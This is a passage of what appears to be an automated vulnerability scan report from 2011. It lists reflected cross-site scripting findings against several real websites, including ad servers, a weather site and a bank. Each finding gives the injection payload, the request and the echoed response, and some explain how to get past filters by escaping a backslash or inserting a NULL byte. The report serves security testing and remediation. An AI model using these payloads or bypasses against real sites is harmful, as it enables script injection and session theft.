HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E2F343A11D72B8481BC40D2D653F4B5; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Thu, 03 Feb 2011 13:17:41 GMT
Connection: close


<html>
   
   <head>
       <title>KNOVA
   Search Results
</title>
       <meta http-equiv="content-type" content="text/html;c
...[SNIP]...
<TextArea name="aaef9"><script>alert(1)</script>6d3f3e1bc4b" style="display:none;visibility:hide">
...[SNIP]...

1.432. http://smm.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85494'%3balert(1)//dbe71432c4e was submitted in the h parameter. This input was echoed as 85494';alert(1)//dbe71432c4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS hard to prevent; where possible, the application should not echo user data in this context at all. Here h is a pixel height, so the right fix is validation rather than encoding: reject anything that is not a small positive integer before it reaches the script.

Request

GET /tag.jsp?pid=21818F4&w=300&h=25085494'%3balert(1)//dbe71432c4e&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:48 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="25085494';alert(1)//dbe71432c4e" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.433. http://smm.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed62"%3balert(1)//eec28b3a643 was submitted in the pid parameter. This input was echoed as aed62";alert(1)//eec28b3a643 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS hard to prevent; where possible, the application should not echo user data in this context at all. pid is embedded in a URL that is itself inside a double-quoted JavaScript string, so it needs two encodings applied inside-out: percent-encode the value for the URL, then encode the whole string as a JavaScript literal. Better still, restrict pid to the alphanumeric identifier format seen in the original request (21818F4) and reject anything else.

Request

GET /tag.jsp?pid=21818F4aed62"%3balert(1)//eec28b3a643&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:46 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4aed62";alert(1)//eec28b3a643&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C1220000175%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D134%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woB
...[SNIP]...

1.434. http://smm.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79fda'%3balert(1)//cbed4520d8d was submitted in the w parameter. This input was echoed as 79fda';alert(1)//cbed4520d8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=21818F4&w=30079fda'%3balert(1)//cbed4520d8d&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:46 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="30079fda';alert(1)//cbed4520d8d" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.435. http://thestreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thestreet.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bad9<script>alert(1)</script>6e86ca26221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1 HTTP/1.1
Host: thestreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA6yAEAAAEthmhrrQA-; VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+c+YAA-; Domain=.intellitxt.com; Expires=Mon, 04-Apr-2011 14:22:36 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 14:22:36 GMT
Connection: close
Content-Length: 8275

/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
if('undefined'==typeof $iTXT){var $iTXT={};}if('undefined'==typ
...[SNIP]...
ad();}}};function itxtBegin(){
var itxturl='http://thestreet.us.intellitxt.com/v3/door.jsp?ts='+(new Date()).getTime()+'&pagecl='+itxtbtl()+'&enc='+itxtGCE()+'&fv='+gDFVS()+'&muid='+MUID+'&ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1';
itxturl+='&seid='+gSEID+'&sest='+gSEST;
if ($iTXT && $iTXT.js && $iTXT.js.ready) {$iTXT.js.load(itxturl);
} else if ($iTXT && $iTXT.js) {$iTXT.js.onload = function() {
$iTXT.js.load(itxturl);
...[SNIP]...

1.436. http://thestreet.us.intellitxt.com/v3/door.jsp [sest parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thestreet.us.intellitxt.com
Path:   /v3/door.jsp

Issue detail

The value of the sest request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbce3\'%3balert(1)//470e2868204 was submitted in the sest parameter. This input was echoed as cbce3\\';alert(1)//470e2868204 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /v3/door.jsp?ts=1296742745648&pagecl=2359&enc=&fv=101&muid=&ipid=10685&seid=0&sest=cbce3\'%3balert(1)//470e2868204 HTTP/1.1
Host: thestreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+LRYAA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 14:22:49 GMT
Connection: close
Content-Length: 10430


/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
try{if('undefined'==typeof $iTXT){var $iTXT={};}$iTXT.door={}
...[SNIP]...
omponent(tTXT.replace(/\n/,' ')); while (p.ttxt.indexOf('\'')>-1) p.ttxt=p.ttxt.replace('\'', '%27');p.auat=0;p.lpgv=0;p.ddate=dDate;p.pvu=gPVU;p.pvm=gPVM;p.forcedb=0;p.seid=gSEID;p.unrm=false;p.sest='cbce3\\';alert(1)//470e2868204';p.ru=encodeURIComponent(sRU);cAs(server,p);} else if (gCL){if(((gITXTN!=null&&gITXTN.length)||(gITXTNi!=null&&gITXTNi.length))&&gCL>
...[SNIP]...

1.437. http://weather.weatherbug.com/ [zcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 was submitted in the zcode parameter. This input was echoed as 478ba"style="x:expression(alert(1))"78c9aed888 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?zip=75201&zcode=478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 103556
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:49 GMT
Connection: close


                                                                                   
...[SNIP]...
<iframe name="cds1" src="http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wthrwbug.com/HM@cds1?&LNG=enUS&PC=478ba"style="x:expression(alert(1))"78c9aed888&Z3=75201&L2=Dallas&L3=TX&L5=USA&L1=623&L4=53&WO1=20.3&FC1=1&FC2=126&FC3=7&FC7=33&FC9=49&WO3=101&HO1=2.70&HO4=Cedar/Juniper and Elm.&HO3=-999" width="728" height="90" allowtransparency="true" framebord
...[SNIP]...

1.438. http://weather.weatherbug.com/ [zcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 531ee"%3balert(1)//40807062aa8 was submitted in the zcode parameter. This input was echoed as 531ee";alert(1)//40807062aa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?zip=75201&zcode=6292531ee"%3balert(1)//40807062aa8 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 100657
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:53 GMT
Connection: close


                                                                                   
...[SNIP]...
<script type="text/javascript">
   var feedbackURL = "http://weather.weatherbug.com/feedback-form.html?zcode=6292531ee";alert(1)//40807062aa8&region=8&region_name=North America&country=US&country_name=USA&state_code=TX&state_name=Texas&zip=75201&city_name=Dallas&stat=DALS1";
</script>
...[SNIP]...

1.439. http://weather.weatherbug.com/ [zcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc was submitted in the zcode parameter. This input was echoed as 3b886"style="x:expression(alert(1))"e0fb95ae5dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?zip=75201&zcode=62923b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 104331
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:36 GMT
Connection: close


                                                                                   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="All WeatherBug feeds" href="http://feeds.weatherbug.com/rss.aspx?zipCode=75201&zCode=62923b886"style="x:expression(alert(1))"e0fb95ae5dc&units=0&feed=curr,fcst,cpht,news" />
...[SNIP]...

1.440. http://weather.weatherbug.com/ [zcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c92\'%3balert(1)//fb3d6162354 was submitted in the zcode parameter. This input was echoed as b8c92\\';alert(1)//fb3d6162354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /?zip=75201&zcode=6292b8c92\'%3balert(1)//fb3d6162354 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 101771
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:35:04 GMT
Connection: close


                                                                                   
...[SNIP]...
dmn = document.domain;
        wxOAS_sitepage = 'www.wthrwbug.com/HM';
    wxOAS_url = 'http://pub.weatherbug.com/RealMedia/ads/';
    wxOAS_targetparams = '&DMN=' + dmn + '&LNG=enUS&PC=6292b8c92\\';alert(1)//fb3d6162354&Z3=75201&L2=Dallas&L3=TX&L5=USA&L1=623&L4=53&WO1=20.3&FC1=1&FC2=126&FC3=7&FC7=33&FC9=49&WO3=101&HO1=2.70&HO4=Cedar/Juniper and Elm.&HO3=-999';
    wxOAS_listpos = 'cds1,cds2,cds3,cds4,cds9';
   
...[SNIP]...

1.441. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/Business/Products/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5e39"><script>alert(1)</script>409e4716c9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5e39"><script>alert(1)</script>409e4716c9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/Business/Products/?%00f5e39"><script>alert(1)</script>409e4716c9d=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:13 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 53268
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/Business/Products/default.html?page=print&%00f5e39"><script>alert(1)</script>409e4716c9d=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.442. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/Personal/Products/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0069b54"><script>alert(1)</script>e1573406ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b54"><script>alert(1)</script>e1573406ba9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/Personal/Products/?%0069b54"><script>alert(1)</script>e1573406ba9=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:49 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 40557
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/Personal/Products/default.html?page=print&%0069b54"><script>alert(1)</script>e1573406ba9=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.443. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002a618"><script>alert(1)</script>b69e85cef55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a618"><script>alert(1)</script>b69e85cef55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/about/?%002a618"><script>alert(1)</script>b69e85cef55=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:46 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 27477
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<
...[SNIP]...
<a href="/bbt/about/default.html?page=print&%002a618"><script>alert(1)</script>b69e85cef55=1" onClick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.444. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/about/privacyandsecurity/completeclientprotection/default.html

Issue detail

